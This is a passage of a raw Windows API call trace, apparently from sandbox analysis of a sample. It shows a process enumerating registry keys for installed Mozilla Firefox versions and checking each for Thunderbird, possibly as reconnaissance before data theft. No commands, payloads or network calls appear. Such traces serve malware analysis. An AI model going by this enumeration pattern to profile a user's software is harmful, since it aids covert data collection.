[0164.041] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x15000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0164.041] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0164.041] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x1, lpName=0x910b70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.041] lstrlenW (lpString="Software\\Mozilla") returned 16 [0164.041] lstrlenW (lpString="\\") returned 1 [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903bd8 [0164.041] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0164.041] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0164.041] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0164.041] lstrlenW (lpString="Mozilla Firefox") returned 15 [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x42) returned 0x900390 [0164.041] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0164.041] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Mozilla Firefox" | out: lpString1="Software\\Mozilla\\Mozilla Firefox") returned="Software\\Mozilla\\Mozilla Firefox" [0164.041] VirtualQuery (in: lpAddress=0x903bd8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903bd8 | out: hHeap=0x8e0000) returned 1 [0164.041] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox", lpSrch="Thunderbird") returned 0x0 [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b80 [0164.041] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x14c) returned 0x0 [0164.042] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.042] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox") returned 32 [0164.042] lstrlenW (lpString="\\") returned 1 [0164.042] GetProcessHeap () returned 0x8e0000 [0164.042] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x44) returned 0x900430 [0164.042] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox" | out: lpString1="Software\\Mozilla\\Mozilla Firefox") returned="Software\\Mozilla\\Mozilla Firefox" [0164.042] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\") returned="Software\\Mozilla\\Mozilla Firefox\\" [0164.042] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\") returned 33 [0164.042] lstrlenW (lpString="25.0 (en-US)") returned 12 [0164.042] GetProcessHeap () returned 0x8e0000 [0164.042] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x5c) returned 0x90a830 [0164.042] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\") returned="Software\\Mozilla\\Mozilla Firefox\\" [0164.042] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\", lpString2="25.0 (en-US)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" [0164.042] VirtualQuery (in: lpAddress=0x900430, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.042] GetProcessHeap () returned 0x8e0000 [0164.042] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900430 | out: hHeap=0x8e0000) returned 1 [0164.042] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpSrch="Thunderbird") returned 0x0 [0164.042] GetProcessHeap () returned 0x8e0000 [0164.042] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x913b88 [0164.042] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x15c) returned 0x0 [0164.042] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Main", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.042] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0164.042] lstrlenW (lpString="\\") returned 1 [0164.042] GetProcessHeap () returned 0x8e0000 [0164.042] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x5e) returned 0x909f48 [0164.042] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" [0164.043] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0164.043] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0164.043] lstrlenW (lpString="Main") returned 4 [0164.043] GetProcessHeap () returned 0x8e0000 [0164.043] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x66) returned 0x911b98 [0164.043] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0164.043] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\", lpString2="Main" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main" [0164.043] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa00, dwLength=0x1c | out: lpBuffer=0x2dfa00*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.043] GetProcessHeap () returned 0x8e0000 [0164.043] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0164.043] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", lpSrch="Thunderbird") returned 0x0 [0164.043] GetProcessHeap () returned 0x8e0000 [0164.043] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x915390 [0164.043] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", phkResult=0x2dfa10 | out: phkResult=0x2dfa10*=0x160) returned 0x0 [0164.043] RegEnumKeyExW (in: hKey=0x160, dwIndex=0x0, lpName=0x915390, lpcchName=0x2dfa0c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa0c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.043] RegCloseKey (hKey=0x160) returned 0x0 [0164.043] VirtualQuery (in: lpAddress=0x915390, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x915000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x12000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.043] GetProcessHeap () returned 0x8e0000 [0164.043] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x915390 | out: hHeap=0x8e0000) returned 1 [0164.043] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.043] GetProcessHeap () returned 0x8e0000 [0164.043] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0164.043] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x1, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.043] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0164.043] lstrlenW (lpString="\\") returned 1 [0164.043] GetProcessHeap () returned 0x8e0000 [0164.043] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x5e) returned 0x909f48 [0164.043] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" [0164.044] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0164.044] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0164.044] lstrlenW (lpString="Uninstall") returned 9 [0164.044] GetProcessHeap () returned 0x8e0000 [0164.044] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x90fb88 [0164.044] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0164.044] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\", lpString2="Uninstall" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall" [0164.044] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa00, dwLength=0x1c | out: lpBuffer=0x2dfa00*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.044] GetProcessHeap () returned 0x8e0000 [0164.044] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0164.044] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", lpSrch="Thunderbird") returned 0x0 [0164.044] GetProcessHeap () returned 0x8e0000 [0164.044] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x915390 [0164.044] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", phkResult=0x2dfa10 | out: phkResult=0x2dfa10*=0x160) returned 0x0 [0164.044] RegEnumKeyExW (in: hKey=0x160, dwIndex=0x0, lpName=0x915390, lpcchName=0x2dfa0c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa0c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.044] RegCloseKey (hKey=0x160) returned 0x0 [0164.044] VirtualQuery (in: lpAddress=0x915390, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x915000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x12000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.044] GetProcessHeap () returned 0x8e0000 [0164.044] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x915390 | out: hHeap=0x8e0000) returned 1 [0164.044] VirtualQuery (in: lpAddress=0x90fb88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.044] GetProcessHeap () returned 0x8e0000 [0164.044] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb88 | out: hHeap=0x8e0000) returned 1 [0164.044] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x2, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.044] RegCloseKey (hKey=0x15c) returned 0x0 [0164.044] VirtualQuery (in: lpAddress=0x913b88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x913000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.044] GetProcessHeap () returned 0x8e0000 [0164.044] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x913b88 | out: hHeap=0x8e0000) returned 1 [0164.044] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.044] GetProcessHeap () returned 0x8e0000 [0164.045] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0164.045] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x1, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.045] RegCloseKey (hKey=0x14c) returned 0x0 [0164.045] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x15000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.045] GetProcessHeap () returned 0x8e0000 [0164.045] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0164.045] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.045] GetProcessHeap () returned 0x8e0000 [0164.045] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0164.045] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x2, lpName=0x910b70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.045] lstrlenW (lpString="Software\\Mozilla") returned 16 [0164.045] lstrlenW (lpString="\\") returned 1 [0164.045] GetProcessHeap () returned 0x8e0000 [0164.045] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903bd8 [0164.045] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0164.045] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0164.045] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0164.045] lstrlenW (lpString="Mozilla Firefox 25.0") returned 20 [0164.045] GetProcessHeap () returned 0x8e0000 [0164.045] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4c) returned 0x90b458 [0164.045] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0164.045] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Mozilla Firefox 25.0" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0") returned="Software\\Mozilla\\Mozilla Firefox 25.0" [0164.045] VirtualQuery (in: lpAddress=0x903bd8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.045] GetProcessHeap () returned 0x8e0000 [0164.045] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903bd8 | out: hHeap=0x8e0000) returned 1 [0164.045] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0", lpSrch="Thunderbird") returned 0x0 [0164.045] GetProcessHeap () returned 0x8e0000 [0164.045] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b80 [0164.045] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x14c) returned 0x0 [0164.046] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bin", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.046] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0164.046] lstrlenW (lpString="\\") returned 1 [0164.046] GetProcessHeap () returned 0x8e0000 [0164.046] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4e) returned 0x90b400 [0164.046] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0") returned="Software\\Mozilla\\Mozilla Firefox 25.0" [0164.046] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0164.046] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0164.046] lstrlenW (lpString="bin") returned 3 [0164.046] GetProcessHeap () returned 0x8e0000 [0164.046] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x54) returned 0x90aa50 [0164.046] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0164.046] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\", lpString2="bin" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\bin") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\bin" [0164.046] VirtualQuery (in: lpAddress=0x90b400, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.046] GetProcessHeap () returned 0x8e0000 [0164.046] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b400 | out: hHeap=0x8e0000) returned 1 [0164.046] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", lpSrch="Thunderbird") returned 0x0 [0164.046] GetProcessHeap () returned 0x8e0000 [0164.046] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x913b88 [0164.046] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x15c) returned 0x0 [0164.046] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.046] RegCloseKey (hKey=0x15c) returned 0x0 [0164.046] VirtualQuery (in: lpAddress=0x913b88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x913000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.046] GetProcessHeap () returned 0x8e0000 [0164.046] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x913b88 | out: hHeap=0x8e0000) returned 1 [0164.046] VirtualQuery (in: lpAddress=0x90aa50, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.046] GetProcessHeap () returned 0x8e0000 [0164.046] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90aa50 | out: hHeap=0x8e0000) returned 1 [0164.046] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x1, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.047] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0164.047] lstrlenW (lpString="\\") returned 1 [0164.047] GetProcessHeap () returned 0x8e0000 [0164.047] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4e) returned 0x90b400 [0164.047] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0") returned="Software\\Mozilla\\Mozilla Firefox 25.0" [0164.047] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0164.047] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0164.047] lstrlenW (lpString="extensions") returned 10 [0164.047] GetProcessHeap () returned 0x8e0000 [0164.047] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x62) returned 0x911b98 [0164.047] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0164.047] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\", lpString2="extensions" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions" [0164.047] VirtualQuery (in: lpAddress=0x90b400, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.047] GetProcessHeap () returned 0x8e0000 [0164.047] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b400 | out: hHeap=0x8e0000) returned 1 [0164.047] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", lpSrch="Thunderbird") returned 0x0 [0164.047] GetProcessHeap () returned 0x8e0000 [0164.047] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x913b88 [0164.047] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x15c) returned 0x0 [0164.047] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.047] RegCloseKey (hKey=0x15c) returned 0x0 [0164.047] VirtualQuery (in: lpAddress=0x913b88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x913000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.047] GetProcessHeap () returned 0x8e0000 [0164.047] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x913b88 | out: hHeap=0x8e0000) returned 1 [0164.047] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.047] GetProcessHeap () returned 0x8e0000 [0164.047] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0164.047] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x2, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.048] RegCloseKey (hKey=0x14c) returned 0x0 [0164.048] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x912000, AllocationBase=0x8e0000, 